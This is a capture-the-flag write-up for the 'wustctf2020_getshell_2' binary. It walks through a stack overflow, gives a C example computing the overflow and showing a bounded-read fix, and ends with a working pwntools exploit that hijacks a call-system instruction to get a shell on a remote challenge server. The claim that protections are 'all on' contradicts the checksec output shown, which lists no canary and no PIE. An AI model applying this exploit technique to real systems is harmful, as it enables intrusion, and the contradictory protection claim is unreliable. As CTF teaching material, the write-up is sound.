
wustctf2020_getshell_2

Ubuntu 16.04


0x01


checksec

[*] '/home/zelas/Desktop/pwn/wustctf2020_getshell_2/wustctf2020_getshell_2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

Protections all on.

IDA

vulnerable()

ssize_t vulnerable()
{
char buf[24]; // [esp+0h] [ebp-18h] BYREF

return read(0, buf, 0x24u); // reads 0x24 = 36 bytes into a 24-byte buffer: a 12-byte stack overflow
}

The suspicious function shell()

int shell()
{
return system("/bbbbbbbbin_what_the_f?ck__--??/sh"); // the trailing "sh" of this string can serve as the argument on its own
}

0x02


Approach

Only 0xc - 0x4 = 8 bytes are usable past the saved ebp, which is not enough to hold system_plt, a return address and sh.

Use call system instead: call_system needs no separate ret, because the call itself pushes the address of the next instruction onto the stack.
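To make the byte budget above concrete, here is an added example (written for this page, not code from the challenge or its author) that computes the overflow figures from the sizes shown in the IDA output and puts the unbounded read next to a bounded replacement. The helper names, the pipe-based demo and the 'a'-filled input are constructed for illustration; the sizes 24 and 0x24 and the 4-byte saved ebp come from the decompilation above.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 24          /* char buf[24] in vulnerable() */
#define READ_LEN 0x24        /* read(0, buf, 0x24u) */
#define SAVED_EBP_SIZE 4     /* i386: saved ebp sits right after buf */

/* How many bytes land past the end of the buffer. */
size_t overflow_bytes(size_t buf_size, size_t read_len)
{
    return read_len > buf_size ? read_len - buf_size : 0;
}

/* Bytes under the sender's control from the return-address slot onward:
 * the overflow minus the saved ebp that sits between buf and the
 * return address. 0xc - 0x4 = 8 for this binary. */
size_t bytes_from_return_addr(size_t buf_size, size_t read_len)
{
    size_t ov = overflow_bytes(buf_size, read_len);
    return ov > SAVED_EBP_SIZE ? ov - SAVED_EBP_SIZE : 0;
}

/* Hardened replacement for vulnerable(): the read length is derived
 * from the buffer size, so no input can reach the saved ebp. */
ssize_t read_bounded(int fd, char *buf, size_t cap)
{
    if (cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);  /* leave room for the terminator */
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

/* Constructed input: 0x24 bytes of 'a' pushed through a pipe, the same
 * size the original read() would accept. Returns how many bytes the
 * bounded read actually stored. */
ssize_t demo_bounded_read(void)
{
    int fds[2];
    char input[READ_LEN];
    char buf[BUF_SIZE];
    ssize_t n;

    if (pipe(fds) != 0)
        return -1;
    memset(input, 'a', sizeof input);
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);
    n = read_bounded(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;  /* 23: the remaining 13 bytes never touch the stack frame */
}

int main(void)
{
    printf("overflow: %zu bytes, from return address: %zu bytes\n",
           overflow_bytes(BUF_SIZE, READ_LEN),
           bytes_from_return_addr(BUF_SIZE, READ_LEN));
    printf("bounded read stored %zd bytes\n", demo_bounded_read());
    return 0;
}
```

The 8-byte figure is exactly what decides the technique in this writeup: two 4-byte words fit, three do not. The bounded variant shows the fix a developer would apply: size the read from the destination, never from a constant that happens to be larger.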

0x03


exp

from pwn import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 28730)
path = './wustctf2020_getshell_2'
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

padding = 0x18 + 0x4           # 24-byte buf plus the saved ebp
sh = 0x8048670                 # address of the trailing "sh" inside the string used by shell()
call_system = 0x8048529        # address of a `call system` instruction (see 0x02)
payload = flat(b'a'*padding, call_system, sh)   # 28 + 4 + 4 = 0x24 bytes, exactly what read() accepts
io.sendline(payload)
io.interactive()

